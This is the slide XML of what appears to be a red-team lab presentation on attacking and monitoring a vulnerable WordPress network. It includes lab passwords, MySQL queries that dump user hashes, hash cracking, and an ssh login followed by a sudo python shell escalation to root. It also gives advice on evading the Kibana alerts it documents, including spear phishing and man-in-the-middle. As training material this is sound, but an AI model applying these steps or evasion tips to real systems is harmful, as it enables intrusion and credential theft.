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Black"/>
      <p:bold r:id="rId23"/>
      <p:boldItalic r:id="rId24"/>
    </p:embeddedFon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Averag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19487B-9B7C-4798-8919-BC28DAC5CFC5}">
  <a:tblStyle styleId="{2519487B-9B7C-4798-8919-BC28DAC5CF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lack-boldItalic.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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a0d5d957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a0d5d957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a0d5d95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a0d5d95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-lauren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0d5d957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a0d5d957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0d5d957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a0d5d957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a0d5d957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a0d5d957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-austin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aaa2fe9df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aaa2fe9df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a0d5d95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a0d5d95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a0d5d95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a0d5d95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a0d5d95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a0d5d95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0d5d95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a0d5d95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a0d5d95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a0d5d95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12825" y="1401650"/>
            <a:ext cx="7357500" cy="8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900"/>
              <a:t>Red Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3900"/>
              <a:t> Engagement</a:t>
            </a:r>
            <a:endParaRPr sz="39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2386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Attack, Defense &amp; Analysis of a Vulnerable Network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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1109400" y="756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Unsalted User Password Hash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="301" name="Google Shape;301;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="24653" l="0" r="-16265" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6549000" y="0"/>
            <a:ext cx="3000000" cy="2922750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="302" name="Google Shape;302;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6549000" y="2922750"/>
            <a:ext cx="2595001" cy="2220750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Google Shape;303;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8519450" y="2445750"/>
            <a:ext cx="353100" cy="12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770200" y="4797775"/>
            <a:ext cx="353100" cy="12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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1368625"/>
            <a:ext cx="45159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sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability?</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Once we had the password R@v3nSecurity from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Michael's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> account we were able to use Mysql to find Steven’s unsalted password hash.</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>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Mysql -u -root -p</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Password: R@v3nSecurity</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Show databases;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Use wordpress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Show tables;</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk2"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk2"/>
                </a:highlight>
              </a:rPr>
              <a:t>Select * from wp_users</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk2"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Used the John the Ripper tool to uncover the hashed password for Steven.</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve? </a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gave us Steven’s password to ssh into his account to access his information. </a:t>
            </a:r>
            <a:endParaRPr sz="11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306" name="Google Shape;306;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="77349" t="15340"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4515750" y="0"/>
            <a:ext cx="203325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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058975" y="92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Misconfiguration of User Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Google Shape;312;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1545100"/>
            <a:ext cx="4538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b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How did you exploit the vulnerability? </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After gaining Access to Steven’s user account:</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk2"/>
                </a:highlight>
              </a:rPr>
              <a:t>sudo -l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to obtain the information Steven had root access for.</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk2"/>
                </a:highlight>
              </a:rPr>
              <a:t>sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to obtain root access</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a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve?</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Obtained</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access to the user shell to ultimately escalate up to root.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>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Ssh steven@192.168.1.110</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Password: pink84</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Sudo -l</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Sudo python -c ‘import pty;pty.spawn(“/bin/bash”)’</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk2"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent3"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk2"/>
                </a:highlight>
              </a:rPr>
              <a:t>Cd /root</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="dk2"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Text&#10;&#10;Description automatically generated" id="313" name="Google Shape;313;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1499666"/>
            <a:ext cx="4572000" cy="17905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Methods Used to Avoid Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Google Shape;319;p28"/>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detail the alerts placed in Kibana and what methods can be used to attack the machine while </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>mitigating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> detection.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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924850" y="0"/>
            <a:ext cx="643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WordPress User Enumeration </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2571750"/>
            <a:ext cx="6650100" cy="969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2100" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>These types of alerts are resource intensive, most companies run them during off hours. It would be best to perform the attack during business hours in order to mitigate detection</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adding additional flags in order to take a more “stealthy” approach would limit the amount of http request bytes</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143750" y="868275"/>
            <a:ext cx="77490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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11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alerts detect this exploit?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In Kibana the alert is set :</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHEN sum() OF http.request.bytes OVER all documents IS ABOVE 3500 FOR THE LAST 1 minute</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metrics do they measure?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http.request.bytes</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thresholds do they fire at?</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above 3500</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="328" name="Google Shape;328;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3490025"/>
            <a:ext cx="6576500" cy="1653475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="329" name="Google Shape;329;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="50999" t="65708"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6512400" y="3490025"/>
            <a:ext cx="2631600" cy="165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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="5550716" y="43350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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924850" y="0"/>
            <a:ext cx="643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SSH</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134575" y="923400"/>
            <a:ext cx="7749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Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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alerts detect this exploit?</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Alert in Kibana:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHEN count() GROUPED OVER top 5 ‘http.response.status_code’ IS ABOVE 400 FOR THE LAST 5 minutes. </a:t>
            </a:r>
            <a:endParaRPr sz="11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metrics do they measure? </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http.response.status_code</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which thresholds do they fire at?</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Above 400</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2627175"/>
            <a:ext cx="6588000" cy="86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8450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In order to limit the amount of error codes above 400, it would be critical to obtain the targeted user’s login credentials using methods that cannot be detected by an alert such as spear phishing or performing a man-in-the-middle attack.  </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="338" name="Google Shape;338;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25" y="3489075"/>
            <a:ext cx="4572024" cy="1654425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="339" name="Google Shape;339;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="3489075"/>
            <a:ext cx="4572025" cy="1654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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="924850" y="0"/>
            <a:ext cx="643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Stealth Exploitation of Directory Exploration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;346;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134575" y="923400"/>
            <a:ext cx="77490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Monitoring Overview</a:t>
            </a:r>
            <a:endParaRPr b="1"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alerts detect this exploit?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In Kibana the alert is set :</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When max() OF system.process.cpu.total.pct OVER all documents IS ABOVE 0.5 FOR THE LAST 5 minutes</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metrics do they measure? </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s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ystem.process.cpu.total.pct</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which thresholds do they fire at?</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
